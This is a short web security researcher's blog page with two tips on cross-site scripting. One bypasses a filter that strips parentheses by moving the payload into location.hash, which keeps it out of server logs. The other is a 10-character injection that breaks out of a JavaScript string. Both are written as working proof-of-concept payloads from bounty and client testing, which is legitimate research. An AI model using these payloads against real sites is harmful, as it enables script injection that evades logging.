David Sopas – Web Security Researcher

xss

04/08/15 Tips and Tricks # ,

No parenteses allowed? location.hash is here

No parenteses allowed? location.hash is here

I come across a web application in a bounty private program that reflected my var – xss – with the following code:

var _s_tab = xss;
var _s_params = "";
var _s_autoScroll = true;
setTimeout("try { s_callAjax('search', ''); }
catch(ex) { setTimeout(\"s_callAjax('search', '');\", 2000);}", 50);

So what I tried next was to put a XSS vector in place:

</pre>
<pre>vuln-site/?t=xss;alert(1);//</pre>
<pre>

Which reflected:

var _s_tab = xss;alert1;//;

So it removed the () chars… I thought to myself – A Challenge!

My next step was to try something that I already used in a previous research.
Use location.hash and then execute my attack.

vuln-site/?t=1;document.body.innerHTML=location.hash#<img src=x onerror=prompt(1)>

The other good thing about this type of attack is that the payload is in part of the url hash and is therefore never sent to the server. (no servers logs of actual attack payload)

no responses
04/08/15 Tips and Tricks # ,

Tiny XSS vector

I needed a small XSS vector that could fit in a 10 char limit variable in a limit 10 char on a private client to show him that limiting chars on a variable is not secure…

central.push({ 'var1': 'INJECT_HERE' });

So after some attempts I was unable to find one so I called for help 🙂

@soaj1664ashar 10 char fun: ‘-open()-‘

Making a valid Javascript:

central.push({ 'var1': ''-open()-'' });

This XSS vector only opens a new tab/window but in my clients case it was stored in a cookie so it was a pain in the ass to close a window each time he navigated in his web application.

Nice catch!

no responses